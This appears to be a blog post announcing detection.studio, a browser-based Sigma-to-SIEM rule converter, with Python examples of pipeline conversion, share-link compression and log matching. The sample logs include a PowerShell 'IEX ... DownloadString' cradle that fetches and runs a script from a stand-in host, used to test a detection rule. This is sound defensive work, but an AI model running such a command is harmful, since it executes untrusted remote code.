detection.studio

A new tool to help detection engineers get the most out of Sigma.


I am finally happy to bring to life a tool I've wanted to make for a while.

This tool converts from the generic detection format Sigma to a SIEM-specific language, like Splunk's SPL, Elasticsearch's ES|QL or Grafana's Loki. If you'd like to learn more about what the Sigma project is about, I recommend checking out https://sigmahq.io/

detection.studio is very similar to sigconverter.io, but with a few additional features that I think people will hopefully appreciate.


(you can view the above example here)

Local (In-Browser) Conversion

One of the biggest items that I wanted to consider is privacy. Detection rules can be incredibly sensitive to organisations, and incredibly tailored to the environment and applications – often providing a large amount of intelligence to threat actors if someone were to get a hold of them.

I initially explored this in a tweet I made back in Aug 2023.

I knew back then that running the entire pySigma stack locally in-browser was technically possible; however, the performance wasn't comparable to running the conversion natively on a Python server instead.

The solution to this ended up being a mixture of removing the reliance on a CLI via sigma-cli, and instead using the pySigma library directly. This, combined with caching the Pyodide Python modules, resulted in performance that I considered indistinguishable from the server-based solution – albeit at the cost of an initial 2-5 MB download of the Python interpreter and additional dependencies.

Better Support for Pipelines & Filters

A lot of the reason I ended up wanting to uplift the Sigma documentation was that I saw a great technology project – converting from generic detections to SIEM-specific ones – with an adoption and learning curve problem, especially when it came to some of the more complex features of Sigma, such as Pipelines and Filters.

Similar to that, this tool was made to help SOC teams get the most out of their detection rules.

I ended up adding a pseudo-file manager – as basic as it is – to help with adding filters and pipelines to alerts. It's a concept I think a lot of people have become more familiar with in the past 10-15 years, and it translates really well for those wanting to move from this tool back onto the CLI with minimal mental overhead.

For the main targets (Splunk, ES|QL and Loki), I ended up writing in some unique handling for how pipelines get added when these are selected. Especially for logsource prefixing in Splunk, index=my_index source=my_source, and the custom logsource setting in Loki, {index=~"logs-test-.*", source=~"logs-test-.*"} | json | ..., it should give those who are new to Sigma the lightbulb moment I needed to understand the flexibility of the new Pipelines system. A very similar customisation was also enabled for Filters, which I talk about at length here.
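To make the pipeline and filter behaviour concrete, here is a deliberately simplified model of what happens during conversion, written as an added example for this post; it is not detection.studio's code and not pySigma (which is what the tool actually runs). The rule, the filter, the logsource-to-index mapping and the `convert` function are all constructed for the demo, and only the `condition: selection` / `condition: not selection` forms and a few string modifiers are handled.

```python
# Added example, not detection.studio's or pySigma's code: a minimal model of
# how a processing pipeline prefixes a query with the right logsource, and how a
# Sigma filter is folded in as a negated selection. Everything below is constructed.

# Constructed Sigma-style rule, as it would look once parsed from YAML.
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": "DownloadString",
        },
        "condition": "selection",
    },
}

# Constructed filter: a Sigma filter names the rules it applies to and carries
# its own selection; at conversion time it is ANDed onto the rule as a negation.
FILTER = {
    "title": "Exclude patch management server",
    "filter": {
        "rules": ["Suspicious PowerShell download cradle"],
        "selection": {"ComputerName": "patchmgmt01"},
        "condition": "not selection",
    },
}

# Constructed pipeline: (product, category) -> Splunk prefix. This is the piece
# that turns a generic rule into "index=my_index source=my_source ..." for one
# environment; a Loki pipeline would emit a stream selector instead.
PIPELINE = {
    ("windows", "process_creation"): "index=my_index source=my_source",
}


def spl_term(key: str, value: str) -> str:
    """Render one Sigma field (with optional modifier) as an SPL term."""
    field, _, modifier = key.partition("|")
    # Escape backslashes and quotes; SPL uses * as the wildcard.
    v = value.replace("\\", "\\\\").replace('"', '\\"')
    if modifier == "":
        return f'{field}="{v}"'
    if modifier == "contains":
        return f'{field}="*{v}*"'
    if modifier == "startswith":
        return f'{field}="{v}*"'
    if modifier == "endswith":
        return f'{field}="*{v}"'
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_to_spl(selection: dict) -> str:
    """A map-style selection is an implicit AND of its field terms."""
    return " ".join(spl_term(k, v) for k, v in selection.items())


def convert(rule: dict, pipeline: dict, filters=()) -> str:
    """Convert a single-selection rule to SPL, applying the pipeline prefix and any matching filters."""
    ls = rule["logsource"]
    prefix = pipeline.get((ls.get("product"), ls.get("category")), "")
    det = rule["detection"]
    if det["condition"] != "selection":
        raise ValueError("demo only handles 'condition: selection'")
    parts = [selection_to_spl(det["selection"])]
    for f in filters:
        spec = f["filter"]
        if rule["title"] not in spec["rules"]:
            continue  # filter is scoped to other rules
        if spec["condition"] != "not selection":
            raise ValueError("demo only handles 'condition: not selection'")
        parts.append("NOT (" + selection_to_spl(spec["selection"]) + ")")
    return f"{prefix} {' '.join(parts)}".strip()


if __name__ == "__main__":
    print(convert(RULE, {}))                   # no pipeline: bare search terms
    print(convert(RULE, PIPELINE, [FILTER]))   # prefixed and filtered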

Persistent Workspaces, and Share & Export to Zip

A simple persistent Pinia plugin lets the work being done in a session be saved to the browser's local storage, meaning people shouldn't lose all their work on a refresh.

The tool also features a basic share feature, and a download to zip function as well – which will hopefully help people get their first start at a generic "Detection-as-Code" repo.
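Since the share feature has to squeeze a whole rule into a link, and the later wishlist item about compressing the link further leans on Sigma having a very well-defined vocabulary, here is an added example (not detection.studio's own share-link code) of packing a rule into a URL-safe fragment and of what a preset compression dictionary of common Sigma keywords buys. The rule text and the `SIGMA_ZDICT` dictionary are constructed for the demo.

```python
import base64
import zlib

# Added example, not detection.studio's code: share-link encoding of a Sigma
# rule, with and without a preset zlib dictionary of common Sigma keywords.

# Constructed rule text for the demo (raw string keeps the backslash intact).
RULE_YAML = r"""title: Suspicious PowerShell download cradle
status: experimental
description: Detects PowerShell fetching a remote script with DownloadString.
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains: 'DownloadString'
  condition: selection
falsepositives:
  - Administrative scripts that fetch remote content on purpose
level: medium
"""

# Constructed preset dictionary. Deflate can back-reference it from the very
# first byte, so structure that appears in nearly every rule costs a short match
# instead of literal bytes. Encoder and decoder must use the identical bytes, so
# in a real tool this would be versioned: changing it breaks every link already shared.
SIGMA_ZDICT = (
    b"title: \nid: \nstatus: experimental\ndescription: \nreferences:\n  - \n"
    b"author: \ndate: \ntags:\n  - attack.\nlogsource:\n  category: process_creation\n"
    b"  product: windows\ndetection:\n  selection:\n    Image|endswith: \n"
    b"    CommandLine|contains: \n  condition: selection\nfalsepositives:\n  - Unknown\n"
    b"level: medium\n"
)


def encode_share(text: str, zdict: bytes = b"") -> str:
    """Compress (optionally with a preset dictionary), then URL-safe base64 without padding."""
    comp = zlib.compressobj(level=9, zdict=zdict) if zdict else zlib.compressobj(level=9)
    data = comp.compress(text.encode("utf-8")) + comp.flush()
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def decode_share(fragment: str, zdict: bytes = b"") -> str:
    """Inverse of encode_share; zlib raises zlib.error if the dictionary does not match."""
    padded = fragment + "=" * (-len(fragment) % 4)
    data = base64.urlsafe_b64decode(padded)
    decomp = zlib.decompressobj(zdict=zdict) if zdict else zlib.decompressobj()
    return (decomp.decompress(data) + decomp.flush()).decode("utf-8")


def share_sizes(text: str) -> dict:
    """Byte counts of the raw rule versus the two link encodings."""
    return {
        "raw": len(text.encode("utf-8")),
        "link": len(encode_share(text)),
        "link_with_dict": len(encode_share(text, SIGMA_ZDICT)),
    }


if __name__ == "__main__":
    print(share_sizes(RULE_YAML))
    print(encode_share(RULE_YAML, SIGMA_ZDICT))
```

The fragment form (`#...` in the URL) keeps the rule out of server logs, which fits the in-browser privacy goal; the practical limit is what the browser and chat tools will carry, which is exactly the size problem described later in the post.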

Where to from here?

A non-exhaustive list of features I want to add to detection.studio – in some mangled order of priority is:

  • A "Regex101-style" detection matching system – meaning "uploading" a data file of logs to the browser and having the UI show where matches occur – almost like a mini-SIEM. I personally think this would help tremendously with logic building for more complex rules.
    • (I don't think I'll make the data file persistent, as sharing becomes a lot more difficult to fit in the 2MB limit of URL hashes).
  • A more fluent "drop-down" UI for applying modifiers, field-mappings, filters etc. I would also love a UI for selecting the "data" section for generating a Sigma filter based on clicking on a field within the upload data
  • A Sigma rule browser (currently GitHub doesn't allow you to browse rules without an API key, which is an interesting challenge to work around under an effectively "client-only" restriction).
  • The general settings for more quality of life improvements as well – setting the default SIEM for the browser, etc.
  • Compressing the sharing link more – given that Sigma usually is defined keywords, and by association, a very well defined dictionary, compressing the share link would be good to see. I observed first hand why I would want to do this when using this tool during an exercise, where Slack would not let me send the link due to the size of the object itself.
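The first item on that list, matching a rule against uploaded log lines in the browser, is the kind of thing a small evaluator can show end to end. The block below is an added example, not detection.studio's code and not pySigma's matching logic: it evaluates a Sigma-shaped detection block against constructed JSON log lines and reports which line numbers hit, which is what a "Regex101-style" view would highlight. The rule, log lines, and the handful of supported modifiers and condition forms (`and`, `not`) are constructed assumptions for the demo.

```python
import json

# Added example, not detection.studio's or pySigma's code: evaluate a Sigma-shaped
# detection block against raw log lines and return the line numbers that match.

# Constructed rule. The filter is expressed directly in the condition here,
# which is how a Sigma filter ends up in a converted query anyway (a negated selection).
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": "DownloadString",
        },
        "filter": {"ComputerName": "patchmgmt01"},
        "condition": "selection and not filter",
    },
}

# Constructed JSON log lines (raw strings so the Windows backslashes survive as JSON escapes).
LOG_LINES = [
    r'{"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami", "ComputerName": "ws01"}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c IEX (New-Object Net.WebClient).DownloadString(\"http://example.invalid/a.ps1\")", "ComputerName": "ws02"}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString(\"http://patch.internal/a.ps1\")", "ComputerName": "patchmgmt01"}',
    "this line is not JSON and is skipped",
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-Date", "ComputerName": "ws03"}',
]


def value_matches(modifier: str, actual, expected: str) -> bool:
    """Sigma string comparisons are case-insensitive; modifiers map to substring tests."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "":
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection: dict, event: dict) -> bool:
    """Every field/value pair of a map-style selection must match (logical AND)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event or not value_matches(modifier, event[field], expected):
            return False
    return True


def condition_holds(condition: str, results: dict) -> bool:
    """Evaluate a conjunction of optionally negated selection names, e.g. 'selection and not filter'."""
    for term in condition.split(" and "):
        negate = term.startswith("not ")
        name = term[4:] if negate else term
        if name not in results:
            raise ValueError(f"unknown selection: {name}")
        if results[name] == negate:  # a negated hit, or a plain miss, fails the AND
            return False
    return True


def match_rule(rule: dict, lines: list) -> list:
    """Return 1-based numbers of the lines the rule fires on; unparsable lines are skipped."""
    det = rule["detection"]
    selections = {k: v for k, v in det.items() if k != "condition"}
    hits = []
    for number, line in enumerate(lines, start=1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(event, dict):
            continue
        results = {name: selection_matches(sel, event) for name, sel in selections.items()}
        if condition_holds(det["condition"], results):
            hits.append(number)
    return hits


if __name__ == "__main__":
    for n in match_rule(RULE, LOG_LINES):
        print(f"line {n}: {LOG_LINES[n - 1][:80]}")
```

Line 2 is the only hit: line 3 is the same cradle but on the filtered host, line 5 is PowerShell without the cradle, and line 4 is not JSON at all, which a real uploader would want to surface as a parse warning rather than silently drop.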

There's a long way to go before I'd consider it a finished OSS tool, but I'm excited nonetheless to share it with the world.

I do have to shout out a huge thank you to the team who developed SigConverter, for a UI that has brought a lot of new people into the Sigma ecosystem and helped me explain the concepts of Sigma conversion to my team at work. 🙇